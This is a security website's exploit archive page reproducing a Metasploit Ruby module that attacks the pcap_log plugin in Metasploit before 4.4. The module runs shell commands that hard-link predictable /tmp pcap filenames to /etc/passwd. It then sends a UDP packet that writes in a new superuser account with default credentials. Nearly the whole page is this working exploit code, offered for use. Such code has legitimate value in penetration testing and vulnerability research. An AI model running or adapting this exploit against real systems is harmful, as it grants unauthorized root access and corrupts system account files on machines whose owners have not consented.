首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Metasploit < v4.4 pcap_log Plugin Privilege Escalation Exploit
来源:http://www.metasploit.com 作者:metasploit 发布时间:2012-10-15  

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/priv'
require 'msf/core/exploit/local/linux_kernel'
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/local/unix'

load 'lib/msf/core/post/common.rb'
load 'lib/msf/core/post/file.rb'
load 'lib/msf/core/exploit/local/unix.rb'
load 'lib/msf/core/exploit/local/linux.rb'

class Metasploit3 < Msf::Post
 Rank = ExcellentRanking

 include Msf::Post::File
 include Msf::Post::Common

 include Msf::Exploit::Local::Linux
 include Msf::Exploit::Local::Unix

 def initialize(info={})
  super( update_info( info, {
    'Name'   => 'Metasploit pcap_log Local Privilege Escalation',
    'Description'   => %q{
     Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,
     creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these
     filenames to /etc/passwd, then sending a packet with a priviliged user entry contained within.
     This, and all the other packets, are appended to /etc/passwd.

     Successful exploitation results in the creation of a new superuser account.

     This module requires manual clean-up - remove /tmp/msf3-session*pcap files and truncate /etc/passwd.
    },
    'License'       => MSF_LICENSE,
    'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708'],
    'Platform'      => [ 'linux','unix','bsd' ],
    'SessionTypes'  => [ 'shell', 'meterpreter' ],
    'References'    =>
     [
      [ 'BID', '54472' ],
      [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'],
      [ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ],
     ],
    'DisclosureDate' => "Jul 16 2012",
    'Targets'       =>
     [
      [ 'Linux/Unix Universal', {} ],
     ],
    'DefaultTarget' => 0,
   }
   ))
   register_options(
   [ 
    Opt::RPORT(2940),
    OptString.new("USERNAME", [ true, "Username for the new superuser", "metasploit" ]),
    OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ])
   ], self)
 end

 def run
  print_status "Waiting for victim"
  initial_size = cmd_exec("cat /etc/passwd | wc -l")
  i = 60
  while(true) do
   if (i == 60)
    # 0a2940: cmd_exec is slow, so send 1 command to do all the links
    cmd_exec("for i in $(seq 0 120); do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
    i = 0
   end
   i = i+1
   if (cmd_exec("cat /etc/passwd | wc -l") != initial_size)
    # PCAP is flowing
    pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
    print_status("Sending file contents payload to #{session.session_host}")
    udpsock = Rex::Socket::Udp.create(
    {
     'Context' => {'Msf' => framework, 'MsfExploit'=>self}
    })
    udpsock.sendto(pkt, session.session_host, datastore['RPORT'])
    break
   end
   sleep(1)
  end

  if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true")
   print_good("Success. You should now be able to login or su to the 'metasploit' user with password 'metasploit'.")
  else
   print_error("Failed. You should manually verify the 'metasploit' user has not been added") 
  end
  # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload
  #   However beceause the session is not a terminal, su will not always allow this.  
 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Project Pier Arbitrary File Up
·KeyHelp ActiveX LaunchTriPane
·Huawei Technologies Internet M
·Apple iOS MobileMail LibTIFF B
·QQPlayer 3.7.892 m2p quartz.dl
·Apple iOS MobileSafari LibTIFF
·AjaXplorer checkInstall.php Re
·Linux binfmt_script Disclosure
·Windows Escalate Service Permi
·PHP 5.3.4 com_event_sink 0-Day
·Debian OpenSSL Predictable PRN
·Microsoft Office Excel ReadAV
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved